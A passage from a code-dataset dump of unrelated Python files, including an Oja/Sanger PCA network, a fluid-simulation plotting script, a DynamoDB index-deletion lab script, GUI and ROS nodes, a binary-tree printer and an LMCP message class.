cont\n\n #Funcion para actualizar los pesos segun la regla de Oja\n def _Oja_update(self,n_train,current,output):\n #Se recorre cada fila de la matriz de pesos (j en teorica)\n for x in range(len(self.w_OjaSanger)):\n #Se recorre cada entrada de cada fila de la matriz de pesos (cada columna, i en teorica)\n for y in range(len(self.w_OjaSanger[x])):\n self.w_OjaSanger[x,y] += n_train*output[x]*(current[y]-self._suma_Oja(output,y))\n return self\n\n #Funcion para actualizar los pesos segun la regla de Sanger\n def _Sanger_update(self,n_train,current,output):\n #Se recorre cada fila de la matriz de pesos (j en teorica)\n for x in range(len(self.w_OjaSanger)):\n #Se recorre cada entrada de cada fila de la matriz de pesos (cada columna, i en teorica)\n for y in range(len(self.w_OjaSanger[x])):\n self.w_OjaSanger[x,y] += n_train*output[x]*(current[y]-self._suma_Sanger(output,y,x)-self.w_OjaSanger[x,y]*output[x])\n return self\n\n #Funcion que hace la sumatoria de w(ki)*y(k) para los valores de output menores a j-1 (j en teorica)\n def _suma_Sanger(self,output,y,x):\n cont = 0;\n #Se recorre cada valor del output hasta la neurona x-1 (j-1 en teorica)\n #z es k en la teorica\n for z in range(x):\n cont += self.w_OjaSanger[z,y]*output[z];\n return cont\n\n #Funcion para revisar si el cambio de pesos entre epocas es significativo\n def _w_OjaSanger_check(self,tolerance):\n change = 0;\n #Se recorre cada fila de la matriz de pesos\n for x in range(len(self.w_OjaSanger_log_[-1])):\n #Se recorre cada entrada de cada fila de la matriz de pesos (cada columna)\n for y in range(len(self.w_OjaSanger_log_[-1][x])):\n change += (self.w_OjaSanger_log_[-1][x][y]-self.w_OjaSanger_log_[-2][x][y])**2\n if math.sqrt(change) <= tolerance:\n print('El valor de cambio fue menor al tolerado. Se termina el entrenamiento.\\nCambio del vector:')\n print(math.sqrt(change))\n return math.sqrt(change) > tolerance\n\n #Funcion que devuelve n componentes principales segun regla de Oja\n def OjaSanger(self,n,L_in,n_train=0.05,w_tolerance=0.001,w_init=50,OjaSanger=0):\n #n es la cantidad de componentes principales que devuelve la funcion\n #L_in es la lista que contiene los datos (solo input)\n #L_in debe estar centrado en 0\n\n #Primero inicializo los pesos de los componentes principales\n self.w_OjaSanger = np.array([[random.randint(-w_init,w_init)/100 for x in range(len(L_in[0]))] for y in range(n)]);\n\n print('\\nLa red neuronal para Oja-Sanger fue creada con exito.')\n if self.verbose >= 7:\n print('Matriz de pesos (no incluye bias):')\n for x in self.w_OjaSanger:\n print(x)\n print('')\n\n #Inicializo el log de pesos\n self.w_OjaSanger_log_ = [np.copy(self.w_OjaSanger)];\n\n #i cuenta un minimo de iteraciones por si se aplana la funcion al principio\n i=0;\n #b revisa que el cambio de pesos sea significativo\n b=True;\n while b:\n\n #Coeficiente de correccion del n_train\n corr_n = n_train*w_tolerance*i\n\n #Una vez cada vuelta por L_in se reordena la lista\n if i%len(L_in) == 0:\n random.shuffle(L_in);\n if self.verbose >= 7 and i > 0:\n print('Iteracion numero ' + str(i));\n\n #current representa el input actual\n current = L_in[i%len(L_in)];\n\n #output es el resultado de input*pesos\n output = np.dot(self.w_OjaSanger,current);\n\n #Despues actualizo el peso\n if OjaSanger == 0:\n #Actualizacion segun regla de Oja\n self._Oja_update(n_train,current,output);\n elif OjaSanger == 1:\n #Actualizacion segun regla de Sanger\n self._Sanger_update(n_train-corr_n,current,output);\n else:\n print('Mensaje de error 1/2 por variable OjaSanger.')\n\n if self.verbose >= 8:\n print('Matriz de pesos actualizada:\\n')\n for k in self.w_OjaSanger:\n print(k)\n print('')\n\n #Se agrega el peso actualizado al log\n self.w_OjaSanger_log_.append(np.copy(self.w_OjaSanger));\n\n #Reviso si el cambio de pesos es significativo\n b = i < int(math.sqrt(len(L_in))) or self._w_OjaSanger_check(w_tolerance);\n\n i+=1;\n\n if OjaSanger == 0:\n print('\\nSe ha finalizado el entrenamiento segun la regla de Oja.\\nPesos finales:');\n elif OjaSanger == 1:\n print('\\nSe ha finalizado el entrenamiento segun la regla de Sanger.\\nPesos finales:');\n else:\n print('Mensaje de error 2/2 por variable OjaSanger.')\n\n for x in self.w_OjaSanger:\n print(x);\n\n return self.w_OjaSanger\n","sub_path":"otros/ClaseOjaSangerEmilio.py","file_name":"ClaseOjaSangerEmilio.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"546433239","text":"import numpy\nimport matplotlib.pyplot as pyplot\nimport sys\nimport pencil\nimport pickle\n\nparameters = pencil.read_param()\n\nsnap = -1\nvar = \"pvar.dat\"\nif len(sys.argv) == 2:\n snap = int(sys.argv[1])\n var = \"PVAR\" + sys.argv[1]\ndata = pencil.read_var(ivar=snap,magic=\"vorticity\")\npdata = pencil.read_pvar(varfile=var)\n\nx = data.x[3:-3]\ny = data.y[3:-3]\nz = data.z[3:-3]\nux = data.ux[3:-3,3:-3,3:-3]\nuy = data.uy[3:-3,3:-3,3:-3]\nuz = data.uz[3:-3,3:-3,3:-3]\nrho = data.rho[3:-3,3:-3,3:-3]\n\nxp = pdata.xp\nyp = pdata.yp\nzp = pdata.zp\nvpx = pdata.vpx\nvpy = pdata.vpy\nvpz = pdata.vpz\n\ncontours_figure, ((ax1,ax2,ax3)) = pyplot.subplots(1,3)\nplots_figure, ((ax4,ax5,ax6)) = pyplot.subplots(1,3)\n\niyslice = 0\nmarkersize = 0.1\n\n# rms velocity (mean subtracted?) contour\nux_ref = numpy.zeros([len(x),len(y),len(z)])\nuy_ref = numpy.transpose(numpy.broadcast_to(-0.5*x,(len(x),len(y),len(z))))\n#uy_ref = numpy.zeros([len(x),len(y),len(z)])\n#ux_shear_profile = -0.5*x\n#for i in range(len(y)):\n# for j in range(len(z)):\n# uy[:,i,j] = ux_shear_profile\nuz_ref = numpy.zeros([len(x),len(y),len(z)])\nsumthin = ((ux - ux_ref)**2 + (uy - uy_ref)**2 + (uz - uz_ref)**2)**(0.5)\nax1.pcolormesh(x,z,sumthin[:,iyslice,:])\nax1.set_title(\"gas velocity residuals at y=0\")\nax1.set_xlabel(\"x\")\nax1.set_ylabel(\"z\")\n\n# vorticity contour\n#velocity_array = numpy.array([ux,uy,uz])\n#vorticity_raw = pencil.curl(velocity_array,data.dx,data.dy,data.dz)\n#vorticity_x = vorticity_raw[0][3:-3,3:-3,3:-3]\n#vorticity_y = vorticity_raw[1][3:-3,3:-3,3:-3]\n#vorticity_z = vorticity_raw[2][3:-3,3:-3,3:-3]\nvorticity = data.vort[:,3:-3,3:-3,3:-3]\nvorticity_mag = (vorticity[0]**2 + vorticity[1]**2 + vorticity[2]**2)**(0.5)\nax2.pcolormesh(x,z,vorticity_mag[:,iyslice,:])\nax2.set_title(\"magnitude of vorticity at y=0\")\nax2.set_xlabel(\"x\")\nax2.set_ylabel(\"z\")\n\n# dust to gas ratio contour\nfilename = \"rhop_orbit-\" + str(snap) + \".pickle\"\ntry:\n rhop_file = open(filename,\"r\")\n rhop = pickle.load(rhop_file)\nexcept IOError:\n rhop_file = open(filename,\"w\")\n rhop = pencil.particles_to_density(xp,yp,zp,data.x,data.y,data.z)[3:-3,3:-3,3:-3]\n pickle.dump(rhop,rhop_file)\n rhop_file.close()\nepsilon_d = parameters.eps_dtog*rhop/rho\nax3.pcolormesh(x,z,epsilon_d[:,iyslice,:])\nax3.set_title(\"dust to gas ratio at y=0\")\nax3.set_xlabel(\"x\")\nax3.set_ylabel(\"z\")\n\n# typical particle velocity vs epsilon for each grid cell\nfilename = \"vp_rms_orbit-\" + str(snap) + \".pickle\"\ntry:\n vp_rms_file = open(filename,\"r\")\n vp_rms = pickle.load(vp_rms_file)\n where_particles = numpy.where(vp_rms != 0.0)\nexcept IOError:\n vp_rms_file = open(filename,\"w\")\n npar = numpy.zeros([len(x),len(y),len(z)])\n vp_rms = numpy.zeros([len(x),len(y),len(z)])\n for ip in range(len(pdata.ipars)):\n xpar = xp[ip]\n ypar = yp[ip]\n zpar = zp[ip]\n ix = numpy.where(numpy.abs(xpar - x) == numpy.abs(xpar - x).min())[0][0]\n iy = numpy.where(numpy.abs(ypar - y) == numpy.abs(ypar - y).min())[0][0]\n iz = numpy.where(numpy.abs(zpar - z) == numpy.abs(zpar - z).min())[0][0]\n vp_rms[ix,iy,iz] += (vpx[ip]**2 + vpy[ip]**2 + vpz[ip]**2)**(0.5)\n npar[ix,iy,iz] += 1\n prog = float(ip)/float(len(pdata.ipars))\n sys.stdout.write(\"\\r\" + str(prog))\n sys.stdout.flush()\n where_particles = numpy.where(npar != 0)\n vp_rms[where_particles] = vp_rms[where_particles]/npar[where_particles]\n pickle.dump(vp_rms,vp_rms_file)\n vp_rms_file.close()\nvp_rms_pars = vp_rms[where_particles]\nepsilon_d_pars = epsilon_d[where_particles]\norder = numpy.unravel_index(numpy.argsort(epsilon_d_pars),epsilon_d_pars.shape)\nax4.scatter(epsilon_d_pars[order],vp_rms_pars[order]**2,s=markersize,color=\"black\")\nax4.set_title(\"rms particle velocity vs dust to gas ratio\")\nax4.set_xlabel(r\"$\\epsilon_{d}$\")\nax4.set_ylabel(r\"$v_{p,rms}$\")\n\n# voticity vs epsilon for each grid cell\n\nvorticity_mag_pars = vorticity_mag[where_particles]\nax5.scatter(epsilon_d_pars[order],vorticity_mag_pars[order],s=markersize,color=\"black\")\nax5.set_title(\"magnitude of vorticity vs dust to gas ratio\")\nax5.set_xlabel(r\"$\\epsilon_{d}$\")\nax5.set_ylabel(r\"|$\\omega$|\")\n\n# ratio of typical velocites for particles and gas in each grid cell\n\numag = (data.ux[3:-3,3:-3,3:-3]**2 + data.uy[3:-3,3:-3,3:-3]**2 + data.uz[3:-3,3:-3,3:-3]**2)**(0.5)\nvelocity_ratio = vp_rms_pars/umag[where_particles]\nax6.scatter(epsilon_d_pars[order],velocity_ratio[order],s=markersize,color=\"black\")\nax6.axhline(1.0)\nax6.set_title(\"(rms particle velocity)/(magnitude of gas velocity) vs dust to gas ratio\")\nax6.set_xlabel(r\"$\\epsilon_{d}$\")\nax6.set_ylabel(r\"|$\\omega$|\")\n\npyplot.show()\n","sub_path":"pencil-runs/python_scripts/old_turbophoresis-plots.py","file_name":"old_turbophoresis-plots.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129458483","text":"from pprint import pprint\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\nimport argparse\r\nimport time\r\nfrom decimal import *\r\n\r\ndef RemoveGSI(attributename):\r\n region=boto3.session.Session().region_name\r\n dynamodb = boto3.resource('dynamodb', region_name=region) #low-level Client\r\n table = dynamodb.Table('movies') #define which dynamodb table to access\r\n oldindexname = attributename + \"-globo-index\"\r\n\r\n response = table.update(\r\n GlobalSecondaryIndexUpdates=[\r\n {\r\n 'Delete': {\r\n 'IndexName': oldindexname\r\n }\r\n }\r\n ],\r\n )\r\n return response\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"indexattribute\", help=\"Delete GSI based on attribute entered here\")\r\n args = parser.parse_args()\r\n oldGSIkey = (args.indexattribute) #section to collect argument from command line\r\n\r\n result = RemoveGSI(oldGSIkey)\r\n","sub_path":"lab_reference_scripts/DeleteGSI.py","file_name":"DeleteGSI.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540188511","text":"import yaml\nfrom dotmap import DotMap\nimport operator\nimport os\n\n\nclass MyDotMap(DotMap):\n\n def __init__(self, *args, **kwargs):\n DotMap.__init__(self, *args, **kwargs)\n\n def set(self, key, value):\n keys = key.split('.')\n reduce(operator.getitem, keys[:-1], self)[keys[-1]] = value\n\n def to_dict(self):\n return self.toDict()\n\n\ndef get_dict(path, yaml_file):\n return MyDotMap(get_yaml(path, yaml_file))\n\n\ndef get_yaml(path, yaml_file):\n with open(os.path.join(path, yaml_file), 'r') as yaml_data:\n return yaml.safe_load(yaml_data)\n\n\ndef is_equal(object_a, object_b):\n if isinstance(object_a, list):\n if len(object_a) == len(object_b):\n for item_a in object_a:\n if isinstance(item_a, str) or isinstance(item_a, float)\\\n or isinstance(item_a, int) or isinstance(item_a, unicode):\n if item_a not in object_b:\n return False\n elif isinstance(item_a, dict):\n _is_in = False\n for item_b in object_b:\n if cmp(item_a, item_b) == 0:\n _is_in = True\n break\n if not _is_in:\n return False\n\n else:\n if not item_a.is_in(object_b):\n return False\n return True\n else:\n return False\n elif isinstance(object_a, dict):\n return cmp(object_a, object_b) == 0\n","sub_path":"kiali_qe/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22794511","text":"from os.path import splitext, basename\nfrom glob import glob\nimport torch\nimport sys\nimport re\n\n\nclass Embeder():\n \n def __init__(self, embedings_file):\n self.embedings = self.load_embedings(embedings_file)\n\n def load_embedings(self, filename):\n embed = {}\n with open(filename, 'r') as f:\n for line in f.readlines():\n l = line.strip().split()\n char = l[0]\n vec = map(float, l[1:])\n embed[char] = torch.FloatTensor(vec)\n return embed\n\n def get_embeding(self, text):\n embed = torch.stack([self.embedings[c] for c in text])\n return embed.mean(0)\n \ndef load_url_embedings(directory, embeding_file='../embedings.txt', stop=None):\n embedings = []\n e = Embeder(embeding_file)\n for i, f in enumerate(glob('{}/*.jpg'.format(directory))):\n if stop is not None and i >= stop:\n break\n url = splitext(basename(f))[0]\n url = re.sub(r'', '.', url)\n embed = e.get_embeding(url)\n embedings.append(embed)\n return torch.stack(embedings)\n\n\n","sub_path":"gan/embedings.py","file_name":"embedings.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171802580","text":"from typing import Optional\n\nfrom gfw_pixetl import get_module_logger\n\nlogger = get_module_logger(__name__)\n\n\nclass DataType(object):\n def __init__(\n self,\n data_type: str,\n no_data: Optional[int],\n nbits: Optional[int],\n compression: str,\n ) -> None:\n self.data_type: str = data_type\n self.no_data: Optional[int] = no_data\n self.nbits: Optional[int] = nbits\n self.compression: str = compression\n\n\ndef data_type_factory(\n data_type: str, nbits: Optional[int] = None, no_data: Optional[int] = None, **kwargs\n) -> DataType:\n if data_type.lower() == \"boolean\":\n return DataType(data_type=\"Byte\", no_data=0, nbits=1, compression=\"CCITTFAX4\")\n\n elif data_type.lower() == \"uint\":\n return DataType(\n data_type=\"Byte\",\n no_data=0 if not no_data else no_data,\n nbits=None if not nbits and nbits not in range(1, 8) else nbits,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"int\":\n return DataType(\n data_type=\"Byte\",\n no_data=None if not no_data else no_data,\n nbits=None if not nbits and nbits not in range(1, 8) else nbits,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"uint16\":\n return DataType(\n data_type=\"UInt16\",\n no_data=0 if not no_data else no_data,\n nbits=None if not nbits and nbits not in range(9, 16) else nbits,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"int16\":\n return DataType(\n data_type=\"Int16\",\n no_data=None if not no_data else no_data,\n nbits=None if not nbits and nbits not in range(9, 16) else nbits,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"uint32\":\n return DataType(\n data_type=\"UInt32\",\n no_data=0 if not no_data else no_data,\n nbits=None if not nbits and nbits not in range(17, 32) else nbits,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"int32\":\n return DataType(\n data_type=\"Int32\",\n no_data=None if not no_data else no_data,\n nbits=None if not nbits and nbits not in range(17, 32) else nbits,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"float16\" or data_type.lower() == \"half\":\n return DataType(\n data_type=\"Float32\",\n no_data=None if not no_data else no_data,\n nbits=16,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"float32\" or data_type.lower() == \"single\":\n return DataType(\n data_type=\"Float32\",\n no_data=None if not no_data else no_data,\n nbits=None,\n compression=\"DEFLATE\",\n )\n\n elif data_type.lower() == \"float64\" or data_type.lower() == \"double\":\n return DataType(\n data_type=\"Float64\",\n no_data=None if not no_data else no_data,\n nbits=None,\n compression=\"DEFLATE\",\n )\n\n else:\n message = \"Unknown data type {}\".format(data_type)\n logger.exception(message)\n raise ValueError(message)\n","sub_path":"gfw_pixetl/data_type.py","file_name":"data_type.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313833096","text":"import logging\n\nfrom PyQt5.QtWidgets import (\n QMainWindow,\n QLineEdit,\n QRadioButton,\n QPushButton,\n QLabel,\n QGridLayout,\n QWidget,\n QMessageBox,\n)\nfrom PyQt5.QtCore import QSize\n\nlogger = logging.getLogger(\"project-logger\")\n\nclass Form(QWidget):\n\n def __init__(self):\n super(Form, self).__init__()\n\n # GUI components\n self.input_txt = QLineEdit(self)\n self.radio_one = QRadioButton(self)\n self.radio_two = QRadioButton(self)\n self.label = QLabel(self)\n self.button = QPushButton(self)\n\n self.grid = QGridLayout(self)\n\n self.ui()\n self.properties()\n self.events()\n\n def button_clicked(self):\n logger.debug(\"button_clicked\")\n \n msg = QMessageBox(self)\n msg.setText(\"Hi!\")\n msg.setInformativeText(\"Sample Message box with some buttons\")\n msg.setStandardButtons(QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n msg.setDefaultButton(QMessageBox.Save)\n\n ret = msg.exec_()\n \n tmp_dict = {\n QMessageBox.Save: \"Save\",\n QMessageBox.Discard: \"Discard\",\n QMessageBox.Cancel: \"Cancel\",\n }\n\n logger.debug(\"user has clicked on: {}\".format(tmp_dict.get(ret)))\n \n def properties(self):\n self.button.setText(\"Click\")\n self.radio_one.setText(\"Radio One\")\n self.radio_two.setText(\"Radio Two\")\n self.label.setText(\"Label: \")\n\n def events(self):\n self.button.clicked.connect(self.button_clicked)\n \n def ui(self):\n\n self.grid.addWidget(self.label, 0, 0, 1, 1)\n self.grid.addWidget(self.input_txt, 0, 1, 1, 1)\n self.grid.addWidget(self.radio_one, 1, 0, 1, 1)\n self.grid.addWidget(self.radio_two, 2, 0, 1, 1)\n self.grid.addWidget(self.button, 3, 0, 1, 1)\n\n self.setLayout(self.grid)\n \n \n\n \nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n self.central_widget = Form()\n self.setCentralWidget(self.central_widget)\n \n self.setMinimumSize(QSize(1000, 500))\n","sub_path":"gui/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180880392","text":"#!/usr/bin/env python\n# This file is part of test_demo launch file in ishan_ros.\n\nimport rospy\nfrom std_msgs.msg import String\n\nclass PlatformControllers():\n def __init__(self):\n \n rospy.init_node('ish_platf_controllers', anonymous=False)\n \n rospy.loginfo(\"Platform Controllers Node Started\")\n \n self.platfExecutorsTopic = rospy.get_param(\"~platformexecutorsdata\", '/fmCommands/plaExeDat')\n self.platfControllersTopic = rospy.get_param(\"~platformcontrollersdata\", '/fmSignals/plaConDat')\n self.incidentHandlerTopic = rospy.get_param(\"~incidenthandlerdata\", '/fmSafety/incHanDat')\n \n self.pub = rospy.Publisher(self.platfControllersTopic,String)\n r = rospy.Rate(1)\n r.sleep()\n \n rospy.Subscriber(self.platfExecutorsTopic,String,self.on_platfExecutorsTopic)\n rospy.Subscriber(self.incidentHandlerTopic,String, self.on_incidentHandlerTopic)\n \n while not rospy.is_shutdown():\n str = \"PlatformControllersData\"\n self.pub.publish(str)\n r.sleep()\n \n def on_platfExecutorsTopic(self,msg):\n rospy.sleep(20)\n \n def on_incidentHandlerTopic(self,msg):\n rospy.sleep(20) \n\nif __name__ == '__main__':\n try:\n PlatformControllers()\n except:\n rospy.loginfo(\"Platform Controllers Node Terminated\")","sub_path":"fmControllers/platform/ishan/ish_platfControllers/src/ish_platf_controllers.py","file_name":"ish_platf_controllers.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"450310791","text":"from collections import deque\n\n\nclass Node:\n def __init__(self, value=None):\n self.value = value\n self.left = None\n self.right = None\n\n\nclass Tree:\n def __init__(self, representation):\n '''\n representation: list of values representing a binary tree. The left and right\n children of the ith element are 2i+1 and 2i+2, respectively.\n '''\n if not representation:\n return None\n nodes = []\n for i, value in enumerate(representation):\n node = None\n if value is not None:\n node = Node(value)\n if i > 0:\n if i % 2 == 1:\n parent = nodes[(i - 1) // 2]\n parent.left = node\n else:\n parent = nodes[(i - 2) // 2]\n parent.right = node\n nodes.append(node)\n self.root = nodes[0]\n\n @property\n def height(self):\n return self._get_height(self.root)\n\n def _get_height(self, node):\n if node is None:\n return -1\n left_height = self._get_height(node.left)\n right_height = self._get_height(node.right)\n return max(left_height, right_height) + 1\n\n def to_representation(self):\n total_full = 2**(self.height+1)-1 # Number of nodes in the full tree\n representation = []\n q = deque([self.root])\n i = 0\n last_node = -1\n while q and i < total_full:\n node = q.popleft()\n value = None\n left, right = None, None\n if node:\n left = node.left\n right = node.right\n value = node.value\n last_node = i\n q.append(left)\n q.append(right)\n representation.append(value)\n\n i += 1\n return representation[:last_node+1]\n\n def __str__(self):\n VALUE_SIZE = 3\n VALUE_FORMAT = '{:^' + str(VALUE_SIZE) + 'd}'\n LEFT_ARROW = ' /'\n RIGHT_ARROW = '\\\\ '\n representation = self.to_representation()\n height = self.height\n lines = []\n outer = 0\n inner = 1\n prev_h_line = (2**(height+1)-1)*VALUE_SIZE*' '\n for level in range(height, -1, -1):\n first = True\n outer_spaces = VALUE_SIZE * outer * ' '\n inner_spaces = VALUE_SIZE * inner * ' '\n line = outer_spaces\n arrows_line = outer_spaces\n h_line = (2**(height+1)-1)*VALUE_SIZE*' '\n for i in range(2**level-1, 2**(level+1)-1):\n value_str = VALUE_SIZE * ' '\n arrows_str = value_str\n h_start_add = None\n h_end_add = None\n if i < len(representation) and representation[i] is not None:\n value_str = (VALUE_FORMAT).format(representation[i])\n if i % 2 == 1:\n arrows_str = LEFT_ARROW\n h_start_add = VALUE_SIZE\n h_end_add = h_start_add+outer*VALUE_SIZE+VALUE_SIZE//2\n else:\n arrows_str = RIGHT_ARROW\n h_start_add = -(outer+1)*VALUE_SIZE+VALUE_SIZE//2\n h_end_add = 0\n if first:\n first = False\n else:\n arrows_line += inner_spaces\n line += inner_spaces\n if h_start_add is not None and h_end_add is not None:\n h_start = len(arrows_line) + h_start_add\n h_end = len(arrows_line) + h_end_add\n h_line = _insert_str(h_line, '_', h_start, h_end)\n arrows_line += arrows_str\n line += value_str\n line += outer_spaces\n arrows_line += outer_spaces\n line = _merge_lines(line, prev_h_line)\n prev_h_line = h_line\n lines.append(line)\n if level > 0:\n lines.append(arrows_line)\n outer = inner\n inner = 2*inner+1\n remove_left = min([len(line)-len(line.lstrip()) for line in lines])\n remove_right = min([len(line)-len(line.rstrip()) for line in lines])\n lines = [line[remove_left:-remove_right] for line in lines]\n return '\\n'.join(reversed(lines))\n\n\ndef _insert_str(string, char, start_pos, end_pos):\n replacement = char * (end_pos - start_pos)\n return string[:start_pos] + replacement + string[end_pos:]\n\n\ndef _merge_lines(line, h_line):\n for i, (c_line, c_h_line) in enumerate(zip(line, h_line)):\n if len(c_line.strip()) == 0:\n line = line[:i] + c_h_line + line[i+1:]\n return line\n\n\nif __name__ == \"__main__\":\n print(Tree(list(range(12))))\n","sub_path":"recursion/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"58157357","text":"#! /usr/bin/python\n\nimport struct\nfrom lmcp import LMCPObject\n#import xml.dom.minidom\n\n#from lmcp import *\nfrom afrl.cmasi import SearchTask\nfrom afrl.cmasi import Location3D\nfrom afrl.cmasi import Wedge\n\n\nclass PointSearchTask(SearchTask.SearchTask):\n\n def __init__(self):\n SearchTask.SearchTask.__init__(self)\n self.LMCP_TYPE = 41\n self.SERIES_NAME = \"CMASI\"\n #Series Name turned into a long for quick comparisons.\n self.SERIES_NAME_ID = 4849604199710720000\n self.SERIES_VERSION = 3\n\n #Define message fields\n self.SearchLocation = Location3D.Location3D() #Location3D\n self.StandoffDistance = 0 #real32\n self.ViewAngleList = [] #Wedge\n\n\n def pack(self):\n \"\"\"\n Packs the object data and returns a string that contains all of the serialized\n members.\n \"\"\"\n buffer = []\n buffer.extend(SearchTask.SearchTask.pack(self))\n buffer.append(struct.pack(\"B\", self.SearchLocation != None ))\n if self.SearchLocation != None:\n buffer.append(struct.pack(\">q\", self.SearchLocation.SERIES_NAME_ID))\n buffer.append(struct.pack(\">I\", self.SearchLocation.LMCP_TYPE))\n buffer.append(struct.pack(\">H\", self.SearchLocation.SERIES_VERSION))\n buffer.append(self.SearchLocation.pack())\n buffer.append(struct.pack(\">f\", self.StandoffDistance))\n buffer.append(struct.pack(\">H\", len(self.ViewAngleList) ))\n for x in self.ViewAngleList:\n buffer.append(struct.pack(\"B\", x != None ))\n if x != None:\n buffer.append(struct.pack(\">q\", x.SERIES_NAME_ID))\n buffer.append(struct.pack(\">I\", x.LMCP_TYPE))\n buffer.append(struct.pack(\">H\", x.SERIES_VERSION))\n buffer.append(x.pack())\n\n return \"\".join(buffer)\n\n def unpack(self, buffer, _pos):\n \"\"\"\n Unpacks data from a string buffer and sets class members\n \"\"\"\n _pos = SearchTask.SearchTask.unpack(self, buffer, _pos)\n _valid = struct.unpack_from(\"B\", buffer, _pos )[0]\n _pos += 1\n if _valid:\n _series = struct.unpack_from(\">q\", buffer, _pos)[0]\n _pos += 8\n _type = struct.unpack_from(\">I\", buffer, _pos)[0]\n _pos += 4\n _version = struct.unpack_from(\">H\", buffer, _pos)[0]\n _pos += 2\n from lmcp import LMCPFactory\n self.SearchLocation = LMCPFactory.LMCPFactory().createObject(_series, _version, _type )\n _pos = self.SearchLocation.unpack(buffer, _pos)\n else:\n self.SearchLocation = None\n self.StandoffDistance = struct.unpack_from(\">f\", buffer, _pos)[0]\n _pos += 4\n _arraylen = struct.unpack_from(\">H\", buffer, _pos )[0]\n _arraylen = struct.unpack_from(\">H\", buffer, _pos )[0]\n self.ViewAngleList = [None] * _arraylen\n _pos += 2\n for x in range(_arraylen):\n _valid = struct.unpack_from(\"B\", buffer, _pos )[0]\n _pos += 1\n if _valid:\n _series = struct.unpack_from(\">q\", buffer, _pos)[0]\n _pos += 8\n _type = struct.unpack_from(\">I\", buffer, _pos)[0]\n _pos += 4\n _version = struct.unpack_from(\">H\", buffer, _pos)[0]\n _pos += 2\n from lmcp import LMCPFactory\n self.ViewAngleList[x] = LMCPFactory.LMCPFactory().createObject(_series, _version, _type )\n _pos = self.ViewAngleList[x].unpack(buffer, _pos)\n else:\n self.ViewAngleList[x] = None\n return _pos\n\n\n def get_SearchLocation(self):\n return self.SearchLocation\n\n def set_SearchLocation(self, value):\n self.SearchLocation = value \n\n def get_StandoffDistance(self):\n return self.StandoffDistance\n\n def set_StandoffDistance(self, value):\n self.StandoffDistance = float( value )\n\n def get_ViewAngleList(self):\n return self.ViewAngleList\n\n\n\n def toString(self):\n \"\"\"\n Returns a string representation of all variables\n \"\"\"\n buf = SearchTask.SearchTask.toString(self)\n buf += \"From PointSearchTask:\\n\"\n buf += \"SearchLocation = \" + str( self.SearchLocation ) + \"\\n\" \n buf += \"StandoffDistance = \" + str( self.StandoffDistance ) + \"\\n\" \n buf += \"ViewAngleList = \" + str( self.ViewAngleList ) + \"\\n\" \n\n return buf;\n\n def getLMCPType(self):\n return self.LMCP_TYPE\n\n def getSeriesName(self):\n return self.SERIES_NAME\n\n def getSeriesNameID(self):\n return self.SERIES_NAME_ID\n\n def getSeriesVersion(self):\n return self.SERIES_VERSION\n\n def toXMLStr(self, ws):\n str = ws + \"\\n\";\n #str +=SearchTask.SearchTask.toXMLMembersStr(self, ws + \" \")\n str += self.toXMLMembersStr(ws + \" \")\n str += ws + \"\\n\";\n return str\n\n def toXMLMembersStr(self, ws):\n buf = \"\"\n buf += SearchTask.SearchTask.toXMLMembersStr(self, ws)\n buf += ws + \"\\n\"\n if self.SearchLocation == None:\n buf += ws + \" \\n\"\n else:\n buf += ws + self.SearchLocation.toXMLStr(ws + \" \") \n buf += ws + \"\\n\"\n buf += ws + \"\" + str(self.StandoffDistance) + \"\\n\"\n buf += ws + \"\\n\"\n for x in self.ViewAngleList:\n if x == None:\n buf += ws + \" \\n\"\n else:\n buf += x.toXMLStr(ws + \" \") \n buf += ws + \"\\n\"\n\n return buf\n \n","sub_path":"concept/auto_generated/afrl/cmasi/PointSearchTask.py","file_name":"PointSearchTask.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"260093678","text":"import json\nimport os\nimport urllib.request\n\nimport pymongo\nfrom shapely.geometry import asShape\n\nimport configure\n\nsettings = configure.settings\n\nroi_coll = pymongo.MongoClient()[settings[\"mongodb\"][\"dbname\"]][settings[\"mongodb\"][\"collname\"][\"rois\"]]\nrsis_coll = pymongo.MongoClient()[settings[\"mongodb\"][\"dbname\"]][settings[\"mongodb\"][\"collname\"][\"rsis\"]]\nlocaldir = settings[\"quickimage\"][\"localdir\"]\n\ndef get_wkt(name):\n return asShape(roi_coll.find_one({\"_id\": name.lower()})[\"geojson\"]).wkt\n\n\ndef getall_wkt():\n return {roi[\"_id\"]: asShape(roi[\"geojson\"]).wkt 